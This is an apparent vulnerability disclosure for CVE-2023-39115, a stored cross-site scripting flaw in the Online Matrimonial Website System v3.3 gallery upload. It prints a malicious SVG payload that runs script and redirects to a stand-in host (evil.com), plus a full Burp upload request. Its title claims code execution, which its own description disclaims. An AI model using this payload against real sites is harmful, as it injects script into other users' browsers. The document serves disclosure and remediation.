
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial Website System Script v3.3 allows attackers to execute arbitrary code by uploading a crafted SVG file. The gallery upload endpoint accepts files of type image/svg+xml without stripping embedded script, so the JavaScript inside the SVG runs in the browser of whoever opens the uploaded image (a stored cross-site scripting issue); the write-up does not demonstrate server-side code execution. Rejecting SVG uploads, or sanitizing them and serving them with a Content-Disposition: attachment header, prevents the embedded script from running.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")

window.location.href="https://evil.com"
</script>
</svg>


Steps to reproduce
--------------------------

- Log in with valid credentials.
- Navigate to /profile-settings.
- Click Gallery -> Add New Image -> Browser -> Add Files.
- Choose the SVG file and complete the upload.
- Open the uploaded image; the embedded script executes.


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")

window.location.href="https://evil.com"
</script>
</svg>
-----------------------------167707198418121100152548123485--